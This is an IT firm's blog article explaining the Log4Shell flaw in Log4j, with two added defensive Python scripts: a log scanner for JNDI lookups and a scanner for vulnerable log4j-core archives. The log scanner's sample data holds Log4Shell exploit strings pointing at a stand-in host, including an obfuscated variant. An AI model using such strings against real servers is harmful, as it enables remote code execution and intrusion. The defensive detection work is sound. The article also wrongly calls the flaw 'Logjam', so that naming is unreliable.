The Vulnerability That Has The Security Community in Meltdown: Log4Shell explained
Introduction
Log4Shell, or Logjam, is the name security researchers have given the newly disclosed vulnerability that threw security experts into crisis mode in early December. The name comes from the software package that contains the vulnerability, a logging library called Log4j that is widely used within the very common programming framework, Java.
In short, it is an extremely easy-to-exploit vulnerability that affects millions, if not billions, of devices, systems and programs worldwide, making it a very serious concern in the world of cybersecurity.
What is it?
The vulnerability exists within a standard way for systems to record information about what they are processing, known as logging. A computer may log information entered by users, such as usernames or clicks, or system data, such as error messages and error times. These logs can then be used later to troubleshoot issues, or better understand how the computer is working.
The Log4Shell vulnerability exists because when a specific, malicious combination of text is logged, the logging computer sees the text as a command to be executed rather than information to be entered into the log. The malicious command tells the computer to connect to a separate, external computer and download a program. If the attacker has written the text correctly, this second computer will be one they control, and the program it downloads will be anything the attacker chooses, likely something malicious.
For example, an attacker could pretend to “log in” to Facebook. Instead of a username, they insert a command they have written that exploits this vulnerability. The login fails, of course, but in the background, Facebook logs the failed attempt along with the “username”. The Facebook server sees the username as a command, connects to the external computer where the attacker has left a virus, and suddenly a virus has entered Facebook’s network.
The issue was first discovered in the game Minecraft, where users were able to enter the malicious command in the chat. This would cause the game’s servers to connect to an external computer and download a program which crashed the game for everybody connected. This has since evolved and has now been observed installing ransomware on Minecraft servers.
In another example, one security researcher found Apple’s network to be vulnerable, and was able to prove how easy it was to exploit by simply renaming his iPhone with the malicious text. Once the iPhone was backed up by Apple overnight, the backup servers processed the iPhone name, recognised it as a command, and connected to the external server set up by the researcher.
Why are Researchers so Worried?
The cybersecurity industry has an unfortunate reputation of sounding doomsday alarms too early. But while Log4Shell certainly won’t signal the end of the digital world, it’s certainly a very concerning issue.
Jen Easterly, who is director of the US Cybersecurity and Infrastructure Security Agency (CISA) and is known for her level-headed approach, characterised Log4Shell as “one of the most serious I’ve seen in my entire career, if not the most serious”. So why is the cybersecurity community especially worried about this particular vulnerability? Here are three reasons:
Ease of use – Most serious vulnerabilities in modern software are quite hard to exploit. They often require specialist knowledge, and the chaining together of multiple security flaws before an attacker gets to run their own malicious programs in a secure environment.
Log4Shell is the complete opposite, with many security experts describing it as trivial for an attacker to exploit and gain full control of a target computer. The initial malicious text is only a few words long and is publicly available. All a would-be attacker needs to do is place their malicious program on the internet and insert the location into the text, and their target will download and run it.
Widespread exposure – The program with the vulnerability, log4j, is a common element of a very popular programming language. Programmers don’t reinvent the wheel each time they build a new program; instead, they use publicly available libraries to achieve common requirements, such as logging. Log4j was downloaded more than 80 million times in the last four months alone, and the CISA estimates the number of vulnerable devices to be in the hundreds of millions.
Threat actor activity – Due to the first two reasons, cyber threat actors have been extremely quick to take advantage of the Log4Shell vulnerability. Within hours of its public disclosure, specialist programs had been created to scan the internet, hunting for computers vulnerable to Log4Shell. Internet and security infrastructure providers are already reporting millions of attempts to use the vulnerability, and it’s estimated that more than 50% of Australian businesses have already been probed by cybercriminals looking for a way in.
In less than one week of Log4Shell being publicly disclosed, there have already been many reports of it being used to deploy ransomware and malicious crypto miners. However, the incidents that have been detected and reported are just the tip of the iceberg. The area of most concern is the unknown number of times Log4Shell has been used to deploy more subtle, time-bomb style malicious programs that will cause future damage or give the attacker access at a later date.
It’s not all Doom and Gloom
Despite the concerning aspects of the Log4Shell vulnerability, there are several positive points to the situation.
The vulnerability was first discovered by the security team of Chinese technology giant Alibaba. It was privately disclosed to the developers of log4j on the 24th of November, two weeks before it went public. This gave the developers time to document a fix, as well as create a software patch, both of which are available to anyone.
In addition to the patch, there are other ways to prevent this vulnerability being exploited.
Vendors such as Cloudflare, who provide secure internet hosting infrastructure, and Check Point, who provide intrusion prevention technologies, have been able to update their solutions to identify and block attempts to exploit Log4Shell.
At the time of writing these companies are reporting blocking millions of attempted exploits per day, despite not owning the computers that need patching.
This is a great demonstration of the defensive layers concept that has become popular in modern security, with vulnerable applications being protected by other security solutions until the patch can be applied.
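The “malicious text” described in the What is it? section is a Log4j lookup that names a server to connect to, and the blocking done by the vendors above works by spotting that lookup in incoming requests before the vulnerable application logs it. The script below, an added example that is not part of the original article or any vendor’s product, shows the detection side: it normalises the nested lookup forms Log4j itself would resolve (so a split-up marker cannot slip past a literal match), flags the line, and extracts the scheme and host the lookup points at so they can be blocked or reported. The log lines and the host name attacker.example are constructed for the demonstration.

```python
import re

# Constructed sample log lines for the demo; hosts are placeholders, not real infrastructure.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - "POST /login" user=alice status=401',
    '10.0.0.9 - "POST /login" user=${jndi:ldap://attacker.example/a} status=401',
    '10.0.0.12 - "GET /" ua=${${lower:j}ndi:rmi://attacker.example/b} status=200',
    '10.0.0.7 - "GET /" ua=Mozilla/5.0 status=200',
    '10.0.0.3 - "PUT /device" name=${date:yyyy}-phone status=200',
]

# Log4j lookup forms that evaluate to plain text and can be used to split the
# marker apart: ${lower:X}, ${upper:X}, and the ${anything:-default} form.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# What Log4j would see once those inner lookups are resolved.
_JNDI_TARGET = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//([^/\s}:]+)", re.IGNORECASE)
_JNDI_MARKER = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise(text, max_rounds=10):
    """Resolve nested case/default lookups so an obfuscated marker becomes literal."""
    for _ in range(max_rounds):
        resolved = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text,
        )
        resolved = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text


def scan_line(line):
    """Return None for a clean line, otherwise a dict describing the lookup attempt."""
    norm = normalise(line)
    target = _JNDI_TARGET.search(norm)
    if target:
        return {"scheme": target.group(1).lower(), "host": target.group(2), "normalised": norm}
    if _JNDI_MARKER.search(norm):
        # Marker present but the target could not be parsed: still worth flagging.
        return {"scheme": None, "host": None, "normalised": norm}
    return None


def scan_log(lines):
    """Return (line_index, finding) for every line that carries a JNDI lookup."""
    hits = []
    for idx, line in enumerate(lines):
        finding = scan_line(line)
        if finding:
            hits.append((idx, finding))
    return hits


if __name__ == "__main__":
    for idx, finding in scan_log(SAMPLE_LOG_LINES):
        print(f"line {idx}: {finding['scheme']}://{finding['host']}  <- {finding['normalised']}")
```

The benign `${date:yyyy}` line is deliberately included: a filter that blocks every `${` in user input would break legitimate traffic, so the check only fires on the JNDI marker after normalisation. The extracted scheme and host are the indicators a blocking layer or incident responder actually needs.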
What have Enable Done About it?
Enable Technology are deeply embedded within the cybersecurity industry and became aware of this vulnerability within hours of it being publicly disclosed. As cybersecurity experts, we have a number of tools at our disposal that allowed us to immediately commence proactive scanning of all managed clients’ networks.
The good news is that almost all our clients’ networks were found to be secure, and clean of any vulnerable systems. Where we did identify vulnerable versions of log4j, clients were notified immediately, and patches applied. In most cases exposures were the result of the game Minecraft being installed on corporate assets.
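Finding vulnerable versions of log4j on a client’s systems, as described above, means looking inside Java archives rather than at installed programs, because the library travels bundled inside application JARs, WARs and EARs. The script below is an added example, not Enable’s tooling or any vendor’s scanner: it walks a directory, opens every archive (descending into archives nested inside archives), reads the version recorded in log4j-core’s pom.properties, and checks whether the JndiLookup class is still present, since removing that class was one of the published mitigations for installations that could not be patched immediately. The version threshold MIN_SAFE_VERSION is an assumption chosen for this example and should be confirmed against the Log4j project’s current advisory; the sample archives are constructed in a temporary directory and contain only the two entries the scan reads.

```python
import io
import os
import re
import tempfile
import zipfile

# Paths inside a genuine log4j-core jar: the JNDI lookup plugin class and the
# Maven properties file that records the library version.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Assumption for this example: anything older than this is reported for update.
# Confirm the recommended release against the Log4j project's advisory.
MIN_SAFE_VERSION = (2, 17, 1)


def parse_version(text):
    """Turn '2.14.1' or '2.17.1-rc1' into a comparable tuple of three ints."""
    parts = []
    for piece in text.strip().split(".")[:3]:
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts + [0] * (3 - len(parts)))


def inspect_archive(data, label, findings):
    """Inspect one archive given as bytes; recurse into nested archive members."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip-based archive, nothing to inspect
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_class = JNDI_CLASS in names
        if version is not None or has_class:
            # Unknown version with the class still present is treated conservatively.
            needs_update = has_class and (
                version is None or parse_version(version) < MIN_SAFE_VERSION
            )
            findings.append({
                "archive": label,
                "version": version,
                "jndi_lookup_present": has_class,
                "needs_update": needs_update,
            })
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                inspect_archive(zf.read(name), f"{label}!{name}", findings)


def scan_tree(root):
    """Walk a directory and return a finding for every archive that looks like log4j-core."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fname)
                label = os.path.relpath(path, root).replace(os.sep, "/")
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), label, findings)
    return sorted(findings, key=lambda f: f["archive"])


def _fake_log4j_core(version, keep_jndi_class=True):
    """Constructed stand-in for a log4j-core jar holding only the entries the scan reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if keep_jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, constructed
    return buf.getvalue()


def build_sample_tree():
    """Constructed directory: old jar, current jar, class-removed jar, and a WAR nesting the old one."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "lib"))
    samples = {
        "lib/log4j-core-2.14.1.jar": _fake_log4j_core("2.14.1"),
        "lib/log4j-core-2.17.1.jar": _fake_log4j_core("2.17.1"),
        "lib/log4j-core-2.14.1-patched.jar": _fake_log4j_core("2.14.1", keep_jndi_class=False),
    }
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_log4j_core("2.14.1"))
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
    samples["app.war"] = war.getvalue()
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        status = "UPDATE" if f["needs_update"] else "ok"
        print(f"{status:6} {f['archive']} version={f['version']} jndi_class={f['jndi_lookup_present']}")
```

Point scan_tree at an application directory instead of build_sample_tree() to audit a real host. The nested-archive walk matters in practice: a WAR deployed to an application server carries its own copy of log4j-core under WEB-INF/lib, and a scan that only lists top-level files on disk misses it.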
By acting quickly and proactively Enable Technology ensured that none of our clients suffered any disruption as a result of this vulnerability. The battle for protection against Log4Shell, however, is an ongoing and very real threat. As software vendors recognise indirect vulnerabilities where they had not before, we are proactively auditing and patching managed client networks. Enable’s sophisticated toolsets can rapidly audit, identify and rectify these issues at scale, even as they keep evolving, so our clients can rest assured knowing we are keeping them secure.
Conclusion
Unfortunately, in today’s world of complex and inherited computer code, these vulnerabilities will continue to be discovered and exploited. They cannot be avoided entirely, but they can be planned for.
An IT partner with a strong security pedigree, a solid response plan, a known mapping of software and its supporting vendor, and a robust emergency patching process can be an invaluable asset to a business to help them respond to, contain, and mitigate the impact of cybersecurity issues like this on their day-to-day operations.